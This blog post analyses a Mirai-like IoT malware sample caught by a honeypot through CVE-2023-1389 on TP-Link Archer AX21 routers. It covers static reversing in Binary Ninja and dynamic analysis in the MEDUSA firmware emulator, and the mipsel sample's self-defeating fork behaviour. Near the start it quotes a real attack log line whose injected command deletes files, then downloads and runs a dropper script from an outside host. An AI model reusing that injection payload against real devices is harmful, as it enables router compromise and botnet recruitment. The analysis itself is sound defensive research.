IoT Malware Analysis with MEDUSA

Blogging

Motivation

At CyberDanube, we’re driven by our curiosity regarding fresh embedded/IoT security topics. Therefore, we are constantly researching new threats, leveraging IoT/IIoT honeypots on public internet to intercept attacks in real-time. These insights fuel our internal research and the development of our firmware emulation solution MEDUSA. During an analysis of one of our deployed honeypots, we encountered a command injection exploit attempt that caught our attention. The related Vulnerability is publicly disclosed and has the assigned CVE number 2023-1389, which can be found online:

::ffff:80.94.92.60 - - [12/Mar/2024:07:50:22 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-"

The corresponding exploit specifically targets TP-Link Archer AX21 (AX1800) devices.

The log indicates that the attacker attempts to download and execute a malicious script (tenda.sh) from a server. This script serves as a dropper for multiple binaries, which appear to be cross-compiled for different architectures.

Although the malware has been previously studied by multiple researchers (such as those mentioned in the provided links https://blog.permafrostsec.com/posts/mirai-variant-cve-2023-1389/, https://ducklingstudio.blog.fc2.com/blog-entry-231.html), they primarily analyzed the x64 version of the binary. Given that the exploit targets the TP-Link Archer AX21, we aim to investigate whether there are any differences in behavior or functionality when it is run on the host architecture.

Our plan involves building a digital twin using our SaaS solution, MEDUSA, to conduct dynamic analysis on the acquired malware. However, before proceeding, we aim to gain an overview and understanding of the sample’s behavior. Therefore, we initiated our study by examining the mipsel binary with the MD5 hash 9c044ba07dc2e144b68c13d6507e39c5.

Static Analysis

For static analysis, we decompressed the sample with UPX and loaded it into Binary Ninja. We observed that many functions exhibit a similar structure, parsing arguments and making syscalls with predefined values. For instance, the connect syscall function had the following format:

0040ef00  int32_t sub_40ef00(int32_t arg1, int32_t arg2, int32_t arg3, int32_t arg4)
0040ef20      int32_t $v0 = syscall(0x104a)
0040ef28      if (arg4 != 0)
0040ef3c          open_call_file_ptr = $v0
0040ef40          $v0 = 0xffffffff
0040ef4c      return $v0

To streamline the task of renaming functions in the binary and gain a clearer understanding of its functionality, we opted to utilize Binary Ninja’s API. We constructed a semicolon-separated list containing syscall names and their corresponding numbers, which we sourced from https://syscalls.w3challs.com/?arch=mips_o32

The script iterates over all functions, checks if a syscall has been found, and if so, looks up the syscall number to rename the function accordingly. We highly recommend using the snippet editor plugin for Binary Ninja scripting to facilitate this process.

import binaryninja
def get_syscall(func):
	for inst in func.llil.instructions:
		if inst.operation == LowLevelILOperation.LLIL_SYSCALL:
			return hex(inst.get_reg_value("$v0").value)
def get_syscall_name(hex_number):
	file_path = '/path/to/mipsel_syscall'
	with open(file_path, 'r') as file:
		for line in file:
		parts = line.strip().split(';')
		if len(parts) == 2:
			name, hex_val = parts
		if hex_val == hex_number:
			return name
	return None
def main():
	num = 0
	for func in bv.functions:
		v0 = get_syscall(func)
		if v0:
			syscall = get_syscall_name(v0)
			if syscall:
				func.name = syscall
				num+=1
	print("Renamed {} functions".format(num))
main()

After execution, the script successfully renames 50 functions for us. Continuing our study, we proceed to reverse the main function at address 0x409254. Our analysis reveals that during startup, the malware deletes the executable from the filesystem and appears to access watchdog-related devices to prevent the system from rebooting. Subsequently, it binds itself to TCP port 39123, changes its process name, and forks.

The child process enters a while true loop with two separate paths (the third being an exit condition), indicating that this will be our primary communication loop.

Depending on a flag, the binary follows one of two paths. The right one appears to handle sending data to the C&C server, while the other is for receiving and processing data. In the listening state, the received buffer is passed as a parameter to the function located at 0x40061c (do_stuff_with_buf).

From the initial static analysis, we can draw several conclusions:

The malware is designed to be used in a botnet
There are no apparent signs of anti-debugging techniques
The malware is likely not persistent and only executes in memory.
For dynamic analysis, we may require an internet connection, as without it, the binary might trigger the exit condition prematurely.

Other researchers have noted that the binary attempts to terminate network monitoring applications such as tcpdump, tshark, or Wireshark. However, the sample we obtained did not appear to possess these capabilities. In fact, the execve syscall was not even detected in the binary, which could suggest that the infected machine is solely being used as a denial-of-service bot. Nevertheless, this remains speculative.

Digital Twin with MEDUSA

We utilized firmware version 1.0.5 Build 20221116 for hardware version 4.6 (available at https://static.tp-link.com/upload/firmware/2023/202306/20230601/Archer%20AX21_V4.6_221116.zip) as our base. After uploading it to MEDUSA with the default configuration, we downloaded the built image for local usage. After setting up a virtual bridge (virbr0), we initiated the emulation and were greeted with the motd banner. To assess emulation fidelity, we started the firmware without any modifications.

+------------------------------------------------+
| MEDUSA v1.3 (dynana)                           |
|                                                |
| firmware location:      /medusa/rootfs         |
| static utils:           /medusa/utils          |
|                                                |
| Start exploring your firmware by executing     |
| $ medusa                                       |
|                                                |
+------------------------------------------------+
medusa:~$ medusa start
[...]
wireless is starting...
pcnet32 0000:00:13.0 eth0: link up
saveconfig() begin
saveconfig() end
init_all_vif_name
DEVICES=
wifi_init 
config_profile_set, DfsEnable=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
config_profile_set, IEEE80211H=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
config_profile_set, DfsZeroWait=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
config_profile_set, DfsDedicatedZeroWait=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
config_profile_set, DfsZeroWaitDefault=0>>/etc/wireless/RT2860AP/RT2860_5G.dat
wifi_reload
========= don't cli WIFI-led when booting or not cal
[IPTV] WAN_PHY_IF=eth1.1
[IPTV] LAN_PHY_IF=eth0.2

The resulting ps output appeared promising, and there were also some active network services, as indicated by the netstat output. However, the web server didn’t seem to be running. Consequently, we restarted the emulation and began debugging the uhttpd service.

 482 root     /usr/bin/ledctrl
 488 root     /usr/bin/ledctrl
 489 root     /usr/bin/ledctrl
 495 root     /sbin/hotplug2 --override --persistent --set-rules-file /etc/hot
 548 root     udhcpc -t1 -A3 -b -R -O search -O staticroutes -p /var/run/udhcp
 984 root     lock /var/run/dnsproxy.lock
1985 root     /usr/bin/factory_reset
2007 root     /usr/sbin/sysmond
2029 root     /usr/bin/tmpServer
2030 root     /usr/bin/tdpServer
2031 root     /usr/bin/pfclient
2038 root     /usr/bin/pfclient
2040 root     /usr/bin/pfclient
2041 root     /usr/bin/pfclient
2047 root     /usr/sbin/tsched
2049 root     /usr/bin/tdpServer
2050 root     /usr/bin/tdpServer
2082 root     /usr/bin/sync-server
2111 root     /usr/sbin/imbd
2134 root     /usr/bin/client_mgmt
2206 root     /usr/sbin/dosd
2262 root     /usr/sbin/dosd
2263 root     /usr/sbin/dosd
2432 root     tddp
2456 root     /usr/bin/cloud-brd -c /etc/cloud_config.cfg
2462 root     /usr/bin/cloud-brd -c /etc/cloud_config.cfg
2463 root     /usr/bin/cloud-brd -c /etc/cloud_config.cfg
2483 root     /usr/bin/cloud-client
2489 root     /usr/bin/cloud-https -c /etc/cloud_https.cfg
2494 root     {cloud_https_boo} /usr/bin/lua /usr/sbin/cloud_https_bootreq
2518 root     {S99detPdmaHung} /bin/sh /etc/rc.common /etc/rc.d/S99detPdmaHung
2829 root     {S99zswitch_led} /bin/sh /etc/rc.common /etc/rc.d/S99zswitch_led
2832 root     /usr/bin/switch_led
2877 root     /usr/sbin/conn-indicator
2992 root     /usr/sbin/crond -c /etc/crontabs -l 5
medusa:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
tcp        0      0 127.0.0.1:20002         0.0.0.0:*               LISTEN      
udp        0      0 0.0.0.0:34062           0.0.0.0:*                           
udp        0      0 0.0.0.0:1040            0.0.0.0:*                           
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           
udp        0      0 :::1                    :::*

To investigate why the service exits, we entered the target firmware using msh (an alias for medusa sh static) and added the line set -x to /etc/init.d/uhttpd. This allowed us to trace the code execution. Upon examining the trace output, it became evident that the service file attempted to execute the functions config_load and config_foreach.

medusa:~$ msh
target:/$ /etc/init.d/uhttpd boot
+ START=50
+ SERVICE_DAEMONIZE=1
+ SERVICE_WRITE_PID=1
+ UHTTPD_BIN=/usr/sbin/uhttpd
+ PX5G_BIN=/usr/sbin/px5g
+ OPENSSL_BIN=/usr/bin/openssl
+ ALL_COMMANDS=start stop reload restart boot shutdown enable disable enabled depends 
+ list_contains ALL_COMMANDS boot
+ local var=ALL_COMMANDS
+ local str=boot
+ local val
+ eval val=" ${ALL_COMMANDS} "
+ val= start stop reload restart boot shutdown enable disable enabled depends  
+ [  start stop reload restart !=  start stop reload restart boot shutdown enable disable enabled depends   ]
+ [ boot = reload ]
+ [ -z  ]
+ [ boot != help ]
+ which lock
+ lockfile=/var/run/uhttpd.init.lock
+ lock /var/run/uhttpd.init.lock
+ boot
+ start
+ config_load uhttpd
+ [ -n / ]
+ return 0
+ config_foreach start_instance uhttpd
+ local ___function=start_instance
+ [ 2 -ge 1 ]
+ shift
+ local ___type=uhttpd
+ [ 1 -ge 1 ]
+ shift
+ local section cfgtype
+ [ -z  ]
+ return 0
+ lock -u /var/run/uhttpd.init.lock

Upon searching for the function definitions, we discovered that config_load returns 0 if the environment variable IPKG_INSTROOT is set. However, when the function returns without executing uci_load, the variable CONFIG_SECTIONS in config_foreach remains empty and thus returns without any further execution.

#/etc/functions.sh:
config_load() {
    [ -n "$IPKG_INSTROOT" ] && return 0
    uci_load "$@"
}
config_foreach() {
	local ___function="$1"
	[ "$#" -ge 1 ] && shift
	local ___type="$1"
	[ "$#" -ge 1 ] && shift
	local section cfgtype
	[ -z "$CONFIG_SECTIONS" ] && return 0
	for section in ${CONFIG_SECTIONS}; do
		config_get cfgtype "$section" TYPE
		[ -n "$___type" -a "x$cfgtype" != "x$___type" ] && continue
		eval "$___function \"\$section\" \"\$@\""
	done
}
#/lib/config/uci.sh:
uci_load() {
	local PACKAGE="$1"
	local DATA
	local RET
	local VAR
	_C=0
	if [ -z "$CONFIG_APPEND" ]; then
		for VAR in $CONFIG_LIST_STATE; do
			export ${NO_EXPORT:+-n} CONFIG_${VAR}=
			export ${NO_EXPORT:+-n} CONFIG_${VAR}_LENGTH=
		done
		export ${NO_EXPORT:+-n} CONFIG_LIST_STATE=
		export ${NO_EXPORT:+-n} CONFIG_SECTIONS=
		export ${NO_EXPORT:+-n} CONFIG_NUM_SECTIONS=0
		export ${NO_EXPORT:+-n} CONFIG_SECTION=
	fi
	DATA="$(/sbin/uci ${UCI_CONFIG_DIR:+-c $UCI_CONFIG_DIR} ${LOAD_STATE:+-P /var/state} -S -n export "$PACKAGE" 2>/dev/null)"
	RET="$?"
	[ "$RET" != 0 -o -z "$DATA" ] || eval "$DATA"
	unset DATA
	${CONFIG_SECTION:+config_cb}
	return "$RET"
}

So, why is the environment variable set in the first place? It appears we stumbled upon a minor bug in the analysis engine. MEDUSA seems to identify the firmware as an OpenWrt variant, which isn’t entirely incorrect. However, as a consequence, an extra environment variable is added to /etc/profile, which isn’t necessary for this particular image.

#MEDUSA nvram simulation
export LD_PRELOAD=/medusa/extensions/nvram/libnvram.so
#MEDUSA OpenWrt INSTROOT not set
export IPKG_INSTROOT=/

After removing the variable, we modified the service file to launch the web server in the foreground and manually started ubusd. Subsequently, executing /etc/init.d/uhttpd boot led to a functional web server.

To verify the application’s functionality, we tested the PoC for CVE-2023-1389 as provided by Tenable (https://www.tenable.com/security/research/tra-2023-11). And indeed, the PoC resulted in the creation of a file by the root user.

target:/$ ls /tmp/
client_list.json   fstab              multi_lang         spool
cloud-brd          is_online          once_online        state
cloud.pid          is_online_v6       once_online_v6     stats
cloud_https.pid    lib                productinfo        sync-server
cloud_service.cfg  lock               resolv.conf        wportal
dropbear           log                resolv.conf.auto
dut_bootdone       luci-indexcache    run
etc                merge-conf.xml     sfe_status
target:/$ saveconfig() begin
saveconfig() end
mergeconfigbycountry() begin
mergeconfigbycountry() end
saveconfig() begin
saveconfig() end
mergeconfigbycountry() begin
mergeconfigbycountry() end
target:/$ cat /tmp/pwned 
uid=0(root) gid=0(root) groups=0(root),10

Dynamic Analysis

For dynamic analysis, we aimed to understand which files the malware accessed, alongside an strace output, to compare against our static analysis results. MEDUSA offers a fantastic utility called oprobe, which essentially traces all files and devices opened by a process across the entire system. Here’s an example of the oprobe output while running the exploit:

medusa:~$ medusa oprobe
sh-506                  0xfffffffe          "/lib/libjson.so.0"
sh-506                  0x4                 "/usr/lib/libjson.so.0"
sh-506                  0x4                 "/lib/libc.so.0"
sh-506                  0x4                 "/lib/libc.so.0"
sh-506                  0x4                 "/lib/libc.so.0"
sh-506                  0x4                 "/lib/libc.so.0"
id-507                  0x4                 "/tmp/pwned"

For strace’ing we rely on the statically compiled utilities provided by MEDUSA. This collection of debugging binaries is invaluable in situations where the target lacks any built-in tools. You can locate these utilities within the target’s path at /medusa/utils.

target:/$ ls /medusa/utils/
bash       gdbserver  perl       strace
busybox    ncat       socat      tcpdump

Additionally, we launched a Wireshark instance on our host machine, specifically on virbr0, just in case the binary attempted to terminate network monitoring applications. Here’s how our tracers are setup within the emulation:

medusa:~$ medusa oprobe > /oprobe.log &
[1] 558
medusa:~$ msh
target:/$ /medusa/utils/strace -s200 -o parent.log ./mpsl

After starting the malware we were a little bit surprised by the results. The oprobe output revealed some intriguing file accesses. We’re not entirely sure of their purpose, but our network capture didn’t indicate any data exfiltration. Yet, the most surprising discovery was probably the behavior of the fork logic.

mpsl-269                0xfffffffe          "/dev/watchdog"
mpsl-269                0xfffffffe          "/dev/misc/watchdog"
strace-266              0x4                 "/etc/localtime"
kvpb5gdjdvpf3tj-271     0x0                 "/tmp"
kvpb5gdjdvpf3tj-272     0x0                 "/proc/"
kvpb5gdjdvpf3tj-272     0x1                 "/tmp"
kvpb5gdjdvpf3tj-272     0xfffffffe          "/opt"
kvpb5gdjdvpf3tj-272     0xfffffffe          "/home"
kvpb5gdjdvpf3tj-272     0x2                 "/dev"
kvpb5gdjdvpf3tj-272     0x4                 "/var"
kvpb5gdjdvpf3tj-272     0x5                 "/sbin"
kvpb5gdjdvpf3tj-271     0x1                 "/tmp/etc"
kvpb5gdjdvpf3tj-271     0x2                 "/tmp/etc/config"
kvpb5gdjdvpf3tj-271     0x1                 "/tmp/multi_lang"
kvpb5gdjdvpf3tj-271     0x1                 "/tmp/stats"
kvpb5gdjdvpf3tj-271     0x0                 "/var"
kvpb5gdjdvpf3tj-271     0x1                 "/var/passwd"
kvpb5gdjdvpf3tj-271     0x1                 "/var/samba"
kvpb5gdjdvpf3tj-271     0x2                 "/var/samba/var"
kvpb5gdjdvpf3tj-271     0x4                 "/var/samba/var/locks"
kvpb5gdjdvpf3tj-271     0x2                 "/var/samba/lib"
kvpb5gdjdvpf3tj-271     0x2                 "/var/samba/private"
kvpb5gdjdvpf3tj-271     0x1                 "/var/Wireless"
kvpb5gdjdvpf3tj-271     0x2                 "/var/Wireless/RT2860AP"
kvpb5gdjdvpf3tj-271     0x1                 "/var/lock"
kvpb5gdjdvpf3tj-271     0x1                 "/var/run"
kvpb5gdjdvpf3tj-271     0x1                 "/var/tmp"
kvpb5gdjdvpf3tj-271     0x2                 "/var/tmp/pc"
kvpb5gdjdvpf3tj-271     0x2                 "/var/tmp/TZ"

While the parent process followed our expectations, the child took a different route. Instead of quietly binding and listening in the background, it behaved like a fork bomb, gobbling up system resources until the oom-killer stepped in. Initially, we wondered if the aim was to exhaust all threads, preventing management services like SSH or HTTP from restarting, thus securing the machine against other malicious actors. But upon reflection, that theory didn’t hold up. We didn’t find any process-killing logic, and other researchers hadn’t reported similar findings. Plus, why would they want to exhaust the TCP stack on the host system?

[   5061]     0  5061       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5062]     0  5062       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5063]     0  5063       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5064]     0  5064       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5065]     0  5065       77        0    12288        0             0 kvpb5gdjdvpf3tj
[   5066]     0  5066       77        0    12288        0             0 kvpb5gdjdvpf3tj
oom-kill:constraint=CONSTRAINT_NONE,nodemask=(null),task=kvpb5gdjdvpf3tj,pid=5066,uid=0
Out of memory: Killed process 5066 (kvpb5gdjdvpf3tj) total-vm:308kB, anon-rss:0kB, file-rss:0kB, shmem-rss:0kB, UID:0 pgtables:12kB oom_score_adj:0
target:/$ net_ratelimit: 895 callbacks suppressed
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets
TCP: too many orphaned sockets

We couldn’t quite figure out why the malware acts so differently on mipsel. For us, it seemed like someone relied a little bit too much on their cross-compilation toolchain and forgot to test it properly. In contrast, when running the armv7 sample the process tree and netstat output match what you’d expect from a MIRAI variant.

 135 root     {sikoik36psnshpl} 1vn1r611wkn1mm3il2n8d8bc
 166 root     {sikoik36psnshpl} 1vn1r611wkn1mm3il2n8d8bc
 167 root     {sikoik36psnshpl} 1vn1r611wkn1mm3il2n8d8bc
 168 root     {sikoik36psnshpl} 1vn1r611wkn1mm3il2n8d8bc
# netstat -tuln 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
tcp        0      0 127.0.0.1:39123         0.0.0.0:*               LISTEN

This minor oversight not only renders the device inoperable but also significantly increases network bandwidth usage. After capturing 30 seconds of network traffic using tcpdump and counting the transmitted bytes, our analysis revealed that the mipsel variant transferred 2638 times more data than its corresponding armv7 variant within that timeframe.

======================================================================
| IO Statistics (mipsel)          || IO Statistics (armv7)           |
|                                 ||                                 |
| Duration: 30.0 secs             || Duration: 28.3 secs             |
| Interval: 30.0 secs             || Interval: 28.3 secs             |
|                                 ||                                 |
| Col 1: Frames and bytes         || Col 1: Frames and bytes         |
|---------------------------------||---------------------------------|
|              |1                 ||              |1               | |
| Interval     | Frames |  Bytes  || Interval     | Frames | Bytes | |
|---------------------------------||-------------------------------| |
|  0.0 <> 30.0 |  33983 | 2459120 ||  0.0 <> 28.3 |     14 |   837 | |
======================================================================

The malware has been designed for denial of service attacks, but it essentially starts an amplification DoS attack on its own C&C server. Malware, that’s posing a risk to itself, reaches a new level of irony.

Conclusion

Our IoT malware analysis has been a great knowledge extension experience and also revealed entertaining results. We’ve shared insights into our methodology, using static analysis tools alongside our system emulation framework, MEDUSA. The development of a functional digital twin opens possibilties for future security research or the deployment of honeypot traps. And along the way, we’ve shown the critical role of integration tests (or lack thereof, for those with malicious intentions).

This analysis was conducted by Sebastian Dietz on behalf of CyberDanube Security Research.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems, firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

IoT Malware Analysis with MEDUSA